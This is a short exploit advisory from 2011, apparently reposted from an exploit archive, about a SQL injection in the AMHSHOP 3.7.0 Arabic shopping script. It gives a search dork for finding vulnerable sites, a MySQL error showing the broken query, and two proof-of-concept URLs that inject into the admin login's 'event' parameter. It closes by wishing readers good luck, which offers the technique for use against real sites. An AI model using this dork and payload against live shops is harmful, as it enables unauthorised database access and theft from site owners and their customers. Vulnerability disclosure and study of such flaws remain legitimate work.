AMHSHOP 3.7.0 SQL Injection Vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Title            : AMHSHOP 3.7.0 SQL Injection
[+] Name             : AMHSHOP 3.7.0
[+] Affected Version : v3.7.0
[+] Description      : it's an arabic Shopping Script [Payable]
[+] Software         : http://amhserver.com/37/ & http://www.metjar.com/
[+] Tested on        : (L):Vista & Windows Xp and Windows 7
[+] Dork             : Powered by AMHSHOP 3.7.0
[+] Date             : 14/06/2011
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author           : Yassin Aboukir
[+] Contact          : [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>
[+] Site             : http://www.yaboukir.com
[+] Greetz           : Th3 uNkn0wnS Team ! & All My friends
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Error:
            MySQL
 
           * Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users_login_forgotpassword'' AND user_id = '' LIMIT 1' at line 1
           * Error Number:1064
           * SQL: SELECT restricted FROM userspermission WHERE page = 'users_login_forgotpassword'' AND user_id = '' LIMIT 1
 
 
 
# we had contacted the owner before and some websites have fixed the bug ;)
 
[-]   Exploit:-
 
    # http://[localhost]/Path/admin/index.php?module=users&page=login&event=[SQL]
    # http://[localhost]/Path/admin/index.php?module=users&page=login&event=forgotpassword'
 
 
G00D LUCK ALL :)



#  0day.today [2018-01-06]  #